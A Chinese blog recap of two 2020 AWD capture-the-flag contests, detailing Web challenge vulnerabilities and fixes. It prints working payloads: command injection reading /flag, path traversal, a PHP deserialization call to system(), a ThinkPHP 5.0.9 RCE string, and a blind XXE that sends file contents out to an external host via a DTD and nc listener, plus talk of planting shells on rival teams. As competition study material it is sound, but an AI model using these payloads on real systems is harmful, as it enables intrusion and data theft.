2020-02-09 | AWD | UNLOCK

星盟AWD系列邀请赛复盘

2.9

2月9号星盟安全团队举办的线上AWD,三道Web题,两道pwn题。又学到了很多新姿势。

记录下三道Web题中我们发现的漏洞和做题过程。

Web1

上D盾:

test.php中的预置后门:

赶紧删文件,写个脚本批量打。

payloadhttp://39.100.119.37:10480/test.php?out=cat /flag

shell()函数的命令执行漏洞

admin/func.php中存在有漏洞的shell函数:

如何快速发现哪个文件调用了shell函数

熟悉代码审计的师傅应该知道ctags在文件夹中搜索这两个功能。

  • ctags就是定位被调用函数的定义文件:

    这样就能快速找到定义这个函数的文件所在行。

  • 在文件夹中搜索是一般编辑器都有的功能

    我使用sublime,在文件夹中搜索shell,很快就发现在哪处调用了该函数

利用该漏洞需要先登录后台

后台登录账号密码:admin111:admin111

payload?shell&out=127.0.0.1;cat /flag

修复方案:过滤out参数,如果其含有flag字样,直接exit();(这样不严谨,但当时时间紧迫,先这样处理)

更好的修复方案,shell完成的功能是ping命令,那么我们就使用正则来过滤输入的参数是否是正常的域名或者IP

1
if (preg_match('/^(?=^.{3,255}$)[a-zA-Z0-9][-a-zA-Z0-9]{0,62}(\.[a-z0-9A-Z][-a-zA-Z0-9]{0,62})+$|^((25[0-5]|2[0-4]\d|[01]?\d\d?)($|(?!\.$)\.)){4}$/', $target))

Web2

假的预置后门

同Web1一样,在网站根目录下有一个test.php的假后门

一开始D盾扫到还挺兴奋的,但利用起来完全没作用

源码中已经输出了$_$__$___的值,跟注释中的$_='assert';完全不一样,大概就是出题人皮了一下。

pass掉。

目录跳转漏洞

admin/grade.php中,接收文件名,并将文件内容输出到浏览器

payloadhttp://39.100.119.37:21680/admin/grade.php?file=../../../../flag

修复方案:正则匹配..,防止目录遍历

反序列化

login/logout.php

比较简单的反序列化利用

payloadO:1:"A":2:{s:4:"name";s:6:"assert";s:4:"male";s:15:"system('cat /flag');";}

修复方案:多余的操作,直接删除unserialize($_POST['un']);

Web3

Web3的MySQL服务一直有问题,直到比赛结束前半个小时才恢复。

盲XXE

loginCheck.php

登录是通过XML传递usernamepassword参数,而传递的xml我们可控,没有回显,盲XXE读取文件。

XML:

1
2
3
4
5
6
7
8
<?xml version="1.0"?>
<!DOCTYPE message [
<!ENTITY % remote SYSTEM "http://47.112.16.34/xml.dtd">
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///flag">
%remote;
%send;
]>
<message>aaa</message>

外部DTD文件:

1
2
<!ENTITY % start "<!ENTITY &#x25; send SYSTEM 'http://47.112.16.34:1337/?%file;'>">
%start;

在VPS上监听 nc -lp 1337 -vv

抓包请求:

VPS接收到请求:

关于盲XXE更多参考学习:https://www.freebuf.com/vuls/207639.html

总结

赛后在群里看了下其他师傅分享的思路,不得不服,被骚到了。。最重要的还是权限维持。

骚思路:

建立软链接文件/flag

还有发现平台漏洞,拿到所有主机的登录密码:

太强了,向师傅们学习!

3.14

特别感谢星盟安全团队3月的AWD邀请赛!

这次我们团队有几个选手因为有事耽误了,没有参加,导致我们人手不太够。后面环境也出现了不同程度的问题:环境经常崩、无法重置容器等。不过还是特别感谢星盟安全团队,辛苦运维小哥们了!

Web2

Web2是最先开放环境的

前期准备

拷贝源码到本地 -> 上日志监控脚本 -> 上文件监控脚本等等

login.php

直接访问login.php,左下角就存在flag

登录login.php

很多队伍没有修改默认登录账号密码,导致默认登录后拿到flag

主要就是这两个洞在这刷,由于今天人手不太够,也没有怎么维持权限。

Web3

Web3的洞挺多的,就是环境问题导致几个洞用不了,也可能是我们操作不当。

readme

首先前期准备工作做好,源码拷贝下来后发现存在readme.md,我还以为是在GitHub上下载的某个cms,就没有打开这个readme。后来D盾扫到了这个文件存在危险函数,一看,一句话木马。。

傻傻的还以为要寻找文件包含漏洞,要是找到了文件包含,这个文件也早被删了。。知道看到.htaccess的内容,原来可以直接用!赶紧刷一波(很快就没了)

命令执行 反序列化

common目录中的function.php

先把自己的洞给修了,采用正则来匹配输入的是否是合法的IP/域名:

1
if (preg_match('/^(?=^.{3,255}$)[a-zA-Z0-9][-a-zA-Z0-9]{0,62}(\.[a-z0-9A-Z][-a-zA-Z0-9]{0,62})+$|^((25[0-5]|2[0-4]\d|[01]?\d\d?)($|(?!\.$)\.)){4}$/', $target))

结果去利用别人的洞的时候,发现怎么使都不成功,试了很多队伍,一致以为是环境问题导致的PHP脚本没有正常执行。。

同目录下 home.php 中存在反序列化漏洞。感觉和上次(2月)的题目很像啊。。

Web1

Web1是黑盒测试,比赛大概进行了半个小时放出Web1的环境。

一上来随便一测,就是个TP环境,报错看下TP版本:5.0.9,直接RCE:

?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=more%20/flag

一开始试的cat /flag,好像返回结果有点问题,就换成了more

当时没有怎么想着维持权限,只是反弹一个自己团队shell,把洞给修了。

下次遇到这种黑盒的,就直接拿到所有队伍的meterpreter shell,放在后台,这样维权比较方便长久。(希望不会卡。。)

后来莫名访问量.config.php,没想到直接骑上别人的马了,同网站根目录下的jquery.min.js一样,这两个都是软链接文件,链接到/flag

总结

这次的比赛准备的挺充足的,赛前我也调试过几个通防脚本。只不过有些脚本的作用还是没有充分发挥。

比赛人手不够也导致很被动,,

总之,很感谢星盟安全团队这次锻炼的机会!我们还需要更加努力。

评论加载中